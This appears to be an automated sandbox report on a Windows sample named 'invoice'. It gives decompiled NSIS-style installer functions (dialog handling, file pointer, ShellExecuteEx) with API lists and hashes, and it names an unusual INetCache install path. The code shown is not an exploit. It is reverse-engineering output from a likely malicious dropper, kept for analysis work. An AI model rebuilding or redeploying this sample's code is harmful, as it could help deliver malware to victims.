                                            			E00405647(struct _SHELLEXECUTEINFOA* _a4) {
                                            				struct _SHELLEXECUTEINFOA* _t4;
                                            				int _t5;
                                            
                                            				_t4 = _a4;
                                            				_t4->lpIDList = _t4->lpIDList & 0x00000000;
                                            				_t4->cbSize = 0x3c; // executed
                                            				_t5 = ShellExecuteExA(_t4); // executed
                                            				return _t5;
                                            			}






                                            APIs
                                            • ShellExecuteExA.SHELL32(?,0040444B,?), ref: 00405656
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: ExecuteShell
                                            • String ID:
                                            • API String ID: 587946157-0
                                            • Opcode ID: 3dbb5c45fd0362357dc29e094c299a4b113cabf0b50495ccaf1730ce731ee503
                                            • Instruction ID: fedc52184ae6edd1acf052e6849869f1d6de8b7351bc39b82099fbd6471e80b9
                                            • Opcode Fuzzy Hash: 3dbb5c45fd0362357dc29e094c299a4b113cabf0b50495ccaf1730ce731ee503
                                            • Instruction Fuzzy Hash: ECC092B2000200DFE301CF90CB18F077BE8AF55306F028058E1C49A160C7788810CB69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0040405B(int _a4) {
                                            				long _t2;
                                            
                                            				_t2 = SendMessageA( *0x42f408, 0x28, _a4, "true"); // executed
                                            				return _t2;
                                            			}





                                            APIs
                                            • SendMessageA.USER32(00000028,?,?,00403E8B), ref: 00404069
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
                                            • Instruction ID: 0adc9c0e194aa77c868d6ef978719a9753de7db756a7c543b14a3307e76eee0a
                                            • Opcode Fuzzy Hash: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
                                            • Instruction Fuzzy Hash: B2B09235280A00AAEA215B00DE09F467A62A764701F408038B240250B1CAB200A6DB18
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004031A9(long _a4) {
                                            				long _t2;
                                            
                                            				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                            				return _t2;
                                            			}





                                            APIs
                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F0F,?), ref: 004031B7
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                            • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                            • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                            • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00404048(int _a4) {
                                            				int _t2;
                                            
                                            				_t2 = EnableWindow( *0x42a86c, _a4); // executed
                                            				return _t2;
                                            			}





                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,00403E24), ref: 00404052
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
                                            • Instruction ID: d750239a91494785f156a03a2b8d5ac9aaa4eec5ddabb582aaccf4f48b9497e5
                                            • Opcode Fuzzy Hash: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
                                            • Instruction Fuzzy Hash: C9A012710000009BCB015B00EF04C057F61AB507007018434A2404003186310432FF1D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E10001215() {
                                            				void* _t1;
                                            
                                            				_t1 = GlobalAlloc(0x40,  *0x1000405c); // executed
                                            				return _t1;
                                            			}





                                            APIs
                                            • GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8818214645.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000001.00000002.8818183154.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000001.00000002.8818247570.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                            • Associated: 00000001.00000002.8818279279.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_10000000_invoice.jbxd
                                            Similarity
                                            • API ID: AllocGlobal
                                            • String ID:
                                            • API String ID: 3761449716-0
                                            • Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                            • Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
                                            • Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                            • Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E00404A09(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                            				struct HWND__* _v8;
                                            				struct HWND__* _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				intOrPtr _v24;
                                            				signed char* _v28;
                                            				long _v32;
                                            				signed int _v40;
                                            				long _v44;
                                            				signed int* _v56;
                                            				signed char* _v60;
                                            				signed int _v64;
                                            				long _v68;
                                            				void* _v72;
                                            				intOrPtr _v76;
                                            				intOrPtr _v80;
                                            				void* _v84;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t192;
                                            				int _t194;
                                            				intOrPtr _t195;
                                            				intOrPtr _t197;
                                            				long _t201;
                                            				signed int _t205;
                                            				signed int _t216;
                                            				void* _t219;
                                            				void* _t220;
                                            				int _t226;
                                            				signed int _t231;
                                            				signed int _t232;
                                            				signed int _t233;
                                            				signed int _t239;
                                            				signed int _t241;
                                            				signed char _t242;
                                            				signed char _t248;
                                            				void* _t252;
                                            				void* _t254;
                                            				signed char* _t270;
                                            				signed char _t271;
                                            				long _t273;
                                            				long _t276;
                                            				int _t277;
                                            				int _t282;
                                            				signed int _t283;
                                            				long _t284;
                                            				signed int _t287;
                                            				signed int _t294;
                                            				int _t295;
                                            				int _t296;
                                            				signed char* _t302;
                                            				struct HWND__* _t306;
                                            				int _t307;
                                            				signed int* _t308;
                                            				int _t309;
                                            				long _t310;
                                            				signed int _t311;
                                            				void* _t313;
                                            				long _t314;
                                            				int _t315;
                                            				signed int _t316;
                                            				void* _t318;
                                            
                                            				_t306 = _a4;
                                            				_v12 = GetDlgItem(_t306, 0x3f9);
                                            				_v8 = GetDlgItem(_t306, 0x408);
                                            				_t318 = SendMessageA;
                                            				_v20 =  *0x42f448;
                                            				_t282 = 0;
                                            				_v24 =  *0x42f414 + 0x94;
                                            				if(_a8 != 0x110) {
                                            					L23:
                                            					if(_a8 != 0x405) {
                                            						_t285 = _a16;
                                            					} else {
                                            						_a12 = _t282;
                                            						_t285 = 1;
                                            						_a8 = 0x40f;
                                            						_a16 = 1;
                                            					}
                                            					if(_a8 == 0x4e || _a8 == 0x413) {
                                            						_v16 = _t285;
                                            						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
                                            							if(( *0x42f41d & 0x00000002) != 0) {
                                            								L41:
                                            								if(_v16 != _t282) {
                                            									_t231 = _v16;
                                            									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
                                            										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c));
                                            									}
                                            									_t232 = _v16;
                                            									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
                                            										_t285 = _v20;
                                            										_t233 =  *(_t232 + 0x5c);
                                            										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
                                            											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) & 0xffffffdf;
                                            										} else {
                                            											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
                                            										}
                                            									}
                                            								}
                                            								goto L48;
                                            							}
                                            							if(_a8 == 0x413) {
                                            								L33:
                                            								_t285 = 0 | _a8 != 0x00000413;
                                            								_t239 = E00404957(_v8, _a8 != 0x413);
                                            								_t311 = _t239;
                                            								if(_t311 >= _t282) {
                                            									_t88 = _v20 + 8; // 0x8
                                            									_t285 = _t239 * 0x418 + _t88;
                                            									_t241 =  *_t285;
                                            									if((_t241 & 0x00000010) == 0) {
                                            										if((_t241 & 0x00000040) == 0) {
                                            											_t242 = _t241 ^ 0x00000001;
                                            										} else {
                                            											_t248 = _t241 ^ 0x00000080;
                                            											if(_t248 >= 0) {
                                            												_t242 = _t248 & 0x000000fe;
                                            											} else {
                                            												_t242 = _t248 | 0x00000001;
                                            											}
                                            										}
                                            										 *_t285 = _t242;
                                            										E0040117D(_t311);
                                            										_a12 = _t311 + 1;
                                            										_a16 =  !( *0x42f41c) >> 0x00000008 & 0x00000001;
                                            										_a8 = 0x40f;
                                            									}
                                            								}
                                            								goto L41;
                                            							}
                                            							_t285 = _a16;
                                            							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                            								goto L41;
                                            							}
                                            							goto L33;
                                            						} else {
                                            							goto L48;
                                            						}
                                            					} else {
                                            						L48:
                                            						if(_a8 != 0x111) {
                                            							L56:
                                            							if(_a8 == 0x200) {
                                            								SendMessageA(_v8, 0x200, _t282, _t282);
                                            							}
                                            							if(_a8 == 0x40b) {
                                            								_t219 =  *0x42a854; // 0x0
                                            								if(_t219 != _t282) {
                                            									ImageList_Destroy(_t219);
                                            								}
                                            								_t220 =  *0x42a868; // 0x0
                                            								if(_t220 != _t282) {
                                            									GlobalFree(_t220);
                                            								}
                                            								 *0x42a854 = _t282;
                                            								 *0x42a868 = _t282;
                                            								 *0x42f480 = _t282;
                                            							}
                                            							if(_a8 != 0x40f) {
                                            								L88:
                                            								if(_a8 == 0x420 && ( *0x42f41d & 0x00000001) != 0) {
                                            									_t307 = (0 | _a16 == 0x00000020) << 3;
                                            									ShowWindow(_v8, _t307);
                                            									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
                                            								}
                                            								goto L91;
                                            							} else {
                                            								E004011EF(_t285, _t282, _t282);
                                            								_t192 = _a12;
                                            								if(_t192 != _t282) {
                                            									if(_t192 != 0xffffffff) {
                                            										_t192 = _t192 - 1;
                                            									}
                                            									_push(_t192);
                                            									_push(8);
                                            									E004049D7();
                                            								}
                                            								if(_a16 == _t282) {
                                            									L75:
                                            									E004011EF(_t285, _t282, _t282);
                                            									_t194 =  *0x42a868; // 0x0
                                            									_v32 = _t194;
                                            									_t195 =  *0x42f448;
                                            									_v60 = 0xf030;
                                            									_v20 = _t282;
                                            									if( *0x42f44c <= _t282) {
                                            										L86:
                                            										InvalidateRect(_v8, _t282, "true");
                                            										_t197 =  *0x42ebdc; // 0x67efe9
                                            										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
                                            											E00404912(0x3ff, 0xfffffffb, E0040492A(5));
                                            										}
                                            										goto L88;
                                            									}
                                            									_t308 = _t195 + 8;
                                            									do {
                                            										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
                                            										if(_t201 != _t282) {
                                            											_t287 =  *_t308;
                                            											_v68 = _t201;
                                            											_v72 = 8;
                                            											if((_t287 & 0x00000001) != 0) {
                                            												_v72 = 9;
                                            												_v56 =  &(_t308[4]);
                                            												_t308[0] = _t308[0] & 0x000000fe;
                                            											}
                                            											if((_t287 & 0x00000040) == 0) {
                                            												_t205 = (_t287 & 0x00000001) + 1;
                                            												if((_t287 & 0x00000010) != 0) {
                                            													_t205 = _t205 + 3;
                                            												}
                                            											} else {
                                            												_t205 = 3;
                                            											}
                                            											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
                                            											SendMessageA(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
                                            											SendMessageA(_v8, 0x110d, _t282,  &_v72);
                                            										}
                                            										_v20 = _v20 + 1;
                                            										_t308 =  &(_t308[0x106]);
                                            									} while (_v20 <  *0x42f44c);
                                            									goto L86;
                                            								} else {
                                            									_t309 = E004012E2( *0x42a868);
                                            									E00401299(_t309);
                                            									_t216 = 0;
                                            									_t285 = 0;
                                            									if(_t309 <= _t282) {
                                            										L74:
                                            										SendMessageA(_v12, 0x14e, _t285, _t282);
                                            										_a16 = _t309;
                                            										_a8 = 0x420;
                                            										goto L75;
                                            									} else {
                                            										goto L71;
                                            									}
                                            									do {
                                            										L71:
                                            										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
                                            											_t285 = _t285 + 1;
                                            										}
                                            										_t216 = _t216 + 1;
                                            									} while (_t216 < _t309);
                                            									goto L74;
                                            								}
                                            							}
                                            						}
                                            						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                            							goto L91;
                                            						} else {
                                            							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
                                            							if(_t226 == 0xffffffff) {
                                            								goto L91;
                                            							}
                                            							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
                                            							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
                                            								_t310 = 0x20;
                                            							}
                                            							E00401299(_t310);
                                            							SendMessageA(_a4, 0x420, _t282, _t310);
                                            							_a12 = _a12 | 0xffffffff;
                                            							_a16 = _t282;
                                            							_a8 = 0x40f;
                                            							goto L56;
                                            						}
                                            					}
                                            				} else {
                                            					_v32 = 0;
                                            					_v16 = 2;
                                            					 *0x42f480 = _t306;
                                            					 *0x42a868 = GlobalAlloc(0x40,  *0x42f44c << 2);
                                            					_t252 = LoadBitmapA( *0x42f400, 0x6e);
                                            					 *0x42a85c =  *0x42a85c | 0xffffffff;
                                            					_t313 = _t252;
                                            					 *0x42a864 = SetWindowLongA(_v8, 0xfffffffc, E00405000);
                                            					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                            					 *0x42a854 = _t254;
                                            					ImageList_AddMasked(_t254, _t313, 0xff00ff);
                                            					SendMessageA(_v8, 0x1109, 2,  *0x42a854);
                                            					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                            						SendMessageA(_v8, 0x111b, 0x10, 0);
                                            					}
                                            					DeleteObject(_t313);
                                            					_t314 = 0;
                                            					do {
                                            						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
                                            						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
                                            							if(_t314 != 0x20) {
                                            								_v16 = _t282;
                                            							}
                                            							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t282, E00405F87(_t282, _t314, _t318, _t282, _t260)), _t314);
                                            						}
                                            						_t314 = _t314 + 1;
                                            					} while (_t314 < 0x21);
                                            					_t315 = _a16;
                                            					_t283 = _v16;
                                            					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
                                            					_push(0x15);
                                            					E00404026(_a4);
                                            					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
                                            					_push(0x16);
                                            					E00404026(_a4);
                                            					_t316 = 0;
                                            					_t284 = 0;
                                            					if( *0x42f44c <= 0) {
                                            						L19:
                                            						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                            						goto L20;
                                            					} else {
                                            						_t302 = _v20 + 8;
                                            						_v28 = _t302;
                                            						do {
                                            							_t270 =  &(_t302[0x10]);
                                            							if( *_t270 != 0) {
                                            								_v60 = _t270;
                                            								_t271 =  *_t302;
                                            								_t294 = 0x20;
                                            								_v84 = _t284;
                                            								_v80 = 0xffff0002;
                                            								_v76 = 0xd;
                                            								_v64 = _t294;
                                            								_v40 = _t316;
                                            								_v68 = _t271 & _t294;
                                            								if((_t271 & 0x00000002) == 0) {
                                            									if((_t271 & 0x00000004) == 0) {
                                            										_t273 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                            										_t295 =  *0x42a868; // 0x0
                                            										 *(_t295 + _t316 * 4) = _t273;
                                            									} else {
                                            										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
                                            									}
                                            								} else {
                                            									_v76 = 0x4d;
                                            									_v44 = 1;
                                            									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                            									_t296 =  *0x42a868; // 0x0
                                            									_v32 = 1;
                                            									 *(_t296 + _t316 * 4) = _t276;
                                            									_t277 =  *0x42a868; // 0x0
                                            									_t284 =  *(_t277 + _t316 * 4);
                                            								}
                                            							}
                                            							_t316 = _t316 + 1;
                                            							_t302 =  &(_v28[0x418]);
                                            							_v28 = _t302;
                                            						} while (_t316 <  *0x42f44c);
                                            						if(_v32 != 0) {
                                            							L20:
                                            							if(_v16 != 0) {
                                            								E0040405B(_v8);
                                            								_t282 = 0;
                                            								goto L23;
                                            							} else {
                                            								ShowWindow(_v12, 5);
                                            								E0040405B(_v12);
                                            								L91:
                                            								return E0040408D(_a8, _a12, _a16);
                                            							}
                                            						}
                                            						goto L19;
                                            					}
                                            				}
                                            			}

                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00404A21
                                            • GetDlgItem.USER32(?,00000408), ref: 00404A2C
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A76
                                            • LoadBitmapA.USER32(0000006E), ref: 00404A89
                                            • SetWindowLongA.USER32(?,000000FC,00405000), ref: 00404AA2
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AB6
                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AC8
                                            • SendMessageA.USER32(?,00001109,00000002), ref: 00404ADE
                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404AEA
                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AFC
                                            • DeleteObject.GDI32(00000000), ref: 00404AFF
                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B2A
                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B36
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BCB
                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BF6
                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C0A
                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404C39
                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C47
                                            • ShowWindow.USER32(?,00000005), ref: 00404C58
                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D55
                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DBA
                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DCF
                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DF3
                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E13
                                            • ImageList_Destroy.COMCTL32(00000000), ref: 00404E28
                                            • GlobalFree.KERNEL32(00000000), ref: 00404E38
                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EB1
                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00404F5A
                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F69
                                            • InvalidateRect.USER32(?,00000000,?), ref: 00404F89
                                            • ShowWindow.USER32(?,00000000), ref: 00404FD7
                                            • GetDlgItem.USER32(?,000003FE), ref: 00404FE2
                                            • ShowWindow.USER32(00000000), ref: 00404FE9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N$g
                                            • API String ID: 1638840714-2746997053
                                            • Opcode ID: 7e23995b76108e92cb9e54bee6c6a3cf5fdfe82eb0d160314d46ac34ca410947
                                            • Instruction ID: 5e7fd9033250abe3372a8cc080de2667683fe8f184775387c018329cb0bba4e6
                                            • Opcode Fuzzy Hash: 7e23995b76108e92cb9e54bee6c6a3cf5fdfe82eb0d160314d46ac34ca410947
                                            • Instruction Fuzzy Hash: 9502A1B0A00209AFEB20DF55DD85AAE7BB5FB84315F14413AFA10B62E1C7789D42CF58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E00404496(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				long _v16;
                                            				long _v20;
                                            				long _v24;
                                            				char _v28;
                                            				intOrPtr _v32;
                                            				long _v36;
                                            				char _v40;
                                            				unsigned int _v44;
                                            				signed int _v48;
                                            				CHAR* _v56;
                                            				intOrPtr _v60;
                                            				intOrPtr _v64;
                                            				intOrPtr _v68;
                                            				CHAR* _v72;
                                            				void _v76;
                                            				struct HWND__* _v80;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr _t82;
                                            				long _t87;
                                            				signed char* _t89;
                                            				void* _t95;
                                            				signed int _t96;
                                            				int _t109;
                                            				signed char _t114;
                                            				signed int _t118;
                                            				struct HWND__** _t122;
                                            				intOrPtr* _t138;
                                            				CHAR* _t146;
                                            				intOrPtr _t147;
                                            				unsigned int _t150;
                                            				signed int _t152;
                                            				unsigned int _t156;
                                            				signed int _t158;
                                            				signed int* _t159;
                                            				signed char* _t160;
                                            				struct HWND__* _t165;
                                            				struct HWND__* _t166;
                                            				int _t168;
                                            				unsigned int _t197;
                                            				void* _t205;
                                            
                                            				_t156 = __edx;
                                            				_t82 =  *0x42a048; // 0x67d2e4
                                            				_v32 = _t82;
                                            				_t2 = _t82 + 0x3c; // 0x0
                                            				_t3 = _t82 + 0x38; // 0x0
                                            				_t146 = ( *_t2 << 0xa) + 0x430000;
                                            				_v12 =  *_t3;
                                            				if(_a8 == 0x40b) {
                                            					E00405665(0x3fb, _t146);
                                            					E004061CF(_t146);
                                            				}
                                            				_t166 = _a4;
                                            				if(_a8 != 0x110) {
                                            					L8:
                                            					if(_a8 != 0x111) {
                                            						L20:
                                            						if(_a8 == 0x40f) {
                                            							L22:
                                            							_v8 = _v8 & 0x00000000;
                                            							_v12 = _v12 & 0x00000000;
                                            							E00405665(0x3fb, _t146);
                                            							if(E004059EB(_t185, _t146) == 0) {
                                            								_v8 = 1;
                                            							}
                                            							E00405F65(0x429840, _t146);
                                            							_t87 = E004062FD("true");
                                            							_v16 = _t87;
                                            							if(_t87 == 0) {
                                            								L30:
                                            								E00405F65(0x429840, _t146);
                                            								_t89 = E00405996(0x429840);
                                            								_t158 = 0;
                                            								if(_t89 != 0) {
                                            									 *_t89 =  *_t89 & 0x00000000;
                                            								}
                                            								if(GetDiskFreeSpaceA(0x429840,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                            									goto L35;
                                            								} else {
                                            									_t168 = 0x400;
                                            									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                            									asm("cdq");
                                            									_v48 = _t109;
                                            									_v44 = _t156;
                                            									_v12 = 1;
                                            									goto L36;
                                            								}
                                            							} else {
                                            								_t159 = 0;
                                            								if(0 == 0x429840) {
                                            									goto L30;
                                            								} else {
                                            									goto L26;
                                            								}
                                            								while(1) {
                                            									L26:
                                            									_t114 = _v16(0x429840,  &_v48,  &_v28,  &_v40);
                                            									if(_t114 != 0) {
                                            										break;
                                            									}
                                            									if(_t159 != 0) {
                                            										 *_t159 =  *_t159 & _t114;
                                            									}
                                            									_t160 = E00405944(0x429840);
                                            									 *_t160 =  *_t160 & 0x00000000;
                                            									_t159 = _t160 - 1;
                                            									 *_t159 = 0x5c;
                                            									if(_t159 != 0x429840) {
                                            										continue;
                                            									} else {
                                            										goto L30;
                                            									}
                                            								}
                                            								_t150 = _v44;
                                            								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                            								_v44 = _t150 >> 0xa;
                                            								_v12 = 1;
                                            								_t158 = 0;
                                            								__eflags = 0;
                                            								L35:
                                            								_t168 = 0x400;
                                            								L36:
                                            								_t95 = E0040492A(5);
                                            								if(_v12 != _t158) {
                                            									_t197 = _v44;
                                            									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                            										_v8 = 2;
                                            									}
                                            								}
                                            								_t147 =  *0x42ebdc; // 0x67efe9
                                            								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                            									E00404912(0x3ff, 0xfffffffb, _t95);
                                            									if(_v12 == _t158) {
                                            										SetDlgItemTextA(_a4, _t168, 0x429830);
                                            									} else {
                                            										E0040484D(_t168, 0xfffffffc, _v48, _v44);
                                            									}
                                            								}
                                            								_t96 = _v8;
                                            								 *0x42f4c4 = _t96;
                                            								if(_t96 == _t158) {
                                            									_v8 = E0040140B(7);
                                            								}
                                            								if(( *(_v32 + 0x14) & _t168) != 0) {
                                            									_v8 = _t158;
                                            								}
                                            								E00404048(0 | _v8 == _t158);
                                            								if(_v8 == _t158) {
                                            									_t205 =  *0x42a860 - _t158; // 0x0
                                            									if(_t205 == 0) {
                                            										E004043EF();
                                            									}
                                            								}
                                            								 *0x42a860 = _t158;
                                            								goto L53;
                                            							}
                                            						}
                                            						_t185 = _a8 - 0x405;
                                            						if(_a8 != 0x405) {
                                            							goto L53;
                                            						}
                                            						goto L22;
                                            					}
                                            					_t118 = _a12 & 0x0000ffff;
                                            					if(_t118 != 0x3fb) {
                                            						L12:
                                            						if(_t118 == 0x3e9) {
                                            							_t152 = 7;
                                            							memset( &_v76, 0, _t152 << 2);
                                            							_v80 = _t166;
                                            							_v72 = 0x42a870;
                                            							_v60 = E004047E7;
                                            							_v56 = _t146;
                                            							_v68 = E00405F87(_t146, 0x42a870, _t166, 0x429c48, _v12);
                                            							_t122 =  &_v80;
                                            							_v64 = 0x41;
                                            							__imp__SHBrowseForFolderA(_t122);
                                            							if(_t122 == 0) {
                                            								_a8 = 0x40f;
                                            							} else {
                                            								__imp__CoTaskMemFree(_t122);
                                            								E004058FD(_t146);
                                            								_t125 =  *((intOrPtr*)( *0x42f414 + 0x11c));
                                            								if( *((intOrPtr*)( *0x42f414 + 0x11c)) != 0 && _t146 == "C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository") {
                                            									E00405F87(_t146, 0x42a870, _t166, 0, _t125);
                                            									if(lstrcmpiA(0x42e3a0, 0x42a870) != 0) {
                                            										lstrcatA(_t146, 0x42e3a0);
                                            									}
                                            								}
                                            								 *0x42a860 =  *0x42a860 + 1;
                                            								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                            							}
                                            						}
                                            						goto L20;
                                            					}
                                            					if(_a12 >> 0x10 != 0x300) {
                                            						goto L53;
                                            					} else {
                                            						_a8 = 0x40f;
                                            						goto L12;
                                            					}
                                            				} else {
                                            					_t165 = GetDlgItem(_t166, 0x3fb);
                                            					if(E0040596A(_t146) != 0 && E00405996(_t146) == 0) {
                                            						E004058FD(_t146);
                                            					}
                                            					 *0x42ebd8 = _t166;
                                            					SetWindowTextA(_t165, _t146);
                                            					_push( *((intOrPtr*)(_a16 + 0x34)));
